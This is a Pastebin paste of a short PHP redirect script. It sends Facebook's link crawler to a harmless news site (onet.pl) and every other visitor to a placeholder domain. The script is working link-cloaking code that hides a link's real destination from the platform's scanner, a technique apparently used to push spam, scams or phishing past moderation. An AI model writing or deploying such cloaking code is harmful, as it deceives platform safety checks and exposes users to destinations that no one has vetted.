Advertisement
Guest User

Untitled

a guest
Feb 21st, 2018
46
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.28 KB | None | 0 0
  1. <?php
  2.  
  3. ob_start();
  4.  
  5. $ua = $_SERVER['HTTP_USER_AGENT'];
  6.  
  7. if (preg_match('/facebookexternalhit/si',$ua)) {
  8. echo "<script>window.location.href = 'http://onet.pl';</script>";
  9. die();
  10. } else {
  11. echo "<script>window.location.href = 'TU LINK DO DOMENY';</script>";
  12. }
  13.  
  14. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement